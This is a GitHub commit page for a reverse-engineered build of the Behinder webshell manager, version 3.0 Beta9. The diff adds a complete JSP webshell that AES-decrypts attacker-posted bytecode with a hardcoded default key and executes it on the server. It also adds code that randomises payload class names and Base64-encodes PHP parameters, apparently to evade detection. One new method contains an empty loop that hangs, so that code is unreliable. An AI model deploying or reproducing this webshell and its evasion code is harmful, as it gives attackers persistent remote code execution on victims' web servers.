Skip to content

Commit

Permalink
更新V3.0 BETA9
Browse files Browse the repository at this point in the history
  • Loading branch information
zhanghaishan committed Apr 18, 2021
1 parent 577113d commit 898b8c7
Show file tree
Hide file tree
Showing 53 changed files with 2,496 additions and 1,578 deletions.
1 change: 1 addition & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@

# 更新内容
```
2021-04-19 逆向V3.0 Beta9
2021-04-11 逆向V3.0 Beta7 并且修复原版虚拟终端无法输入命令问题
```

Expand Down
23 changes: 23 additions & 0 deletions pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -55,60 +55,69 @@
<groupId>org.openjfx</groupId>
<artifactId>javafx-controls</artifactId>
<version>11</version>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-media</artifactId>
<version>11</version>
<classifier>win</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-media</artifactId>
<version>11</version>
<classifier>mac</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-media</artifactId>
<version>11</version>
<classifier>linux</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-graphics</artifactId>
<version>11</version>
<classifier>win</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-graphics</artifactId>
<version>11</version>
<classifier>mac</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-graphics</artifactId>
<version>11</version>
<classifier>linux</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-fxml</artifactId>
<version>11</version>
<scope>provided</scope>
</dependency>
<!-- https://mvnrepository.com/artifact/org.openjfx/javafx-web -->
<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-web</artifactId>
<version>11</version>
<scope>provided</scope>
</dependency>
<!-- https://mvnrepository.com/artifact/asm/asm-all -->
<dependency>
Expand All @@ -117,6 +126,20 @@
<version>3.2</version>
</dependency>

<!-- https://mvnrepository.com/artifact/org.javassist/javassist -->
<dependency>
<groupId>org.javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.27.0-GA</version>
</dependency>

<dependency>
<groupId>com.sun</groupId>
<artifactId>tools</artifactId>
<version>${maven.compiler.source}</version>
<scope>system</scope>
<systemPath>${env.JAVA_HOME}/lib/tools.jar</systemPath>
</dependency>
</dependencies>

<build>
Expand Down
1 change: 1 addition & 0 deletions server/shell_java9.jsp
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
2 changes: 1 addition & 1 deletion src/main/java/net/rebeyond/behinder/core/Constants.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@

public class Constants {
public static String[] userAgents = new String[]{"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPod; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"};
public static String VERSION = "v3.0 Beta 7 ";
public static String VERSION = "v3.0 Beta 9 ";
public static int MENU_CUT = 1;
public static int MENU_COPY = 16;
public static int MENU_PASTE = 256;
Expand Down
39 changes: 38 additions & 1 deletion src/main/java/net/rebeyond/behinder/core/Params.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Random;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import net.rebeyond.behinder.utils.ReplacingInputStream;
Expand All @@ -32,10 +33,45 @@ public FieldVisitor visitField(int arg0, String filedName, String arg2, String a
}
}, 0);
byte[] result = cw.toByteArray();
String oldClassName = String.format("net/rebeyond/behinder/payload/java/%s", clsName);
String newClassName = getRandomClassName(oldClassName);
result = Utils.replaceBytes(result, Utils.mergeBytes(new byte[]{(byte)(oldClassName.length() + 2), 76}, oldClassName.getBytes()), Utils.mergeBytes(new byte[]{(byte)(newClassName.length() + 2), 76}, newClassName.getBytes()));
result = Utils.replaceBytes(result, Utils.mergeBytes(new byte[]{(byte)oldClassName.length()}, oldClassName.getBytes()), Utils.mergeBytes(new byte[]{(byte)newClassName.length()}, newClassName.getBytes()));
result[7] = 50;
return result;
}

private static String getRandomClassName(String sourceName) {
String[] domainAs = new String[]{"com", "net", "org", "sun"};
String domainB = Utils.getRandomAlpha((new Random()).nextInt(5) + 3).toLowerCase();
String domainC = Utils.getRandomAlpha((new Random()).nextInt(5) + 3).toLowerCase();
String domainD = Utils.getRandomAlpha((new Random()).nextInt(5) + 3).toLowerCase();
String className = Utils.getRandomAlpha((new Random()).nextInt(7) + 4);
className = className.substring(0, 1).toUpperCase() + className.substring(1).toLowerCase();
int domainAIndex = (new Random()).nextInt(4);
String domainA = domainAs[domainAIndex];
int randomSegments = (new Random()).nextInt(3) + 3;
String randomName;
switch(randomSegments) {
case 3:
randomName = domainA + "/" + domainB + "/" + className;
break;
case 4:
randomName = domainA + "/" + domainB + "/" + domainC + "/" + className;
break;
case 5:
randomName = domainA + "/" + domainB + "/" + domainC + "/" + domainD + "/" + className;
break;
default:
randomName = domainA + "/" + domainB + "/" + domainC + "/" + domainD + "/" + className;
}

while(randomName.length() > sourceName.length()) {
}

return randomName;
}

public static byte[] getParamedClassForPlugin(String payloadPath, final Map params) throws Exception {
ClassReader classReader = new ClassReader(Utils.getFileData(payloadPath));
ClassWriter cw = new ClassWriter(1);
Expand Down Expand Up @@ -127,7 +163,8 @@ public static byte[] getParamedPhp(String clsName, Map params) throws Exception
String paraName = (String)var9.next();
if (params.keySet().contains(paraName)) {
String paraValue = (String)params.get(paraName);
code.append(String.format("$%s=\"%s\";", paraName, paraValue));
paraValue = java.util.Base64.getEncoder().encodeToString(paraValue.getBytes());
code.append(String.format("$%s=\"%s\";$%s=base64_decode($%s);", paraName, paraValue, paraName, paraName));
paraList = paraList + ",$" + paraName;
} else {
code.append(String.format("$%s=\"%s\";", paraName, ""));
Expand Down
Loading

0 comments on commit 898b8c7

Please sign in to comment.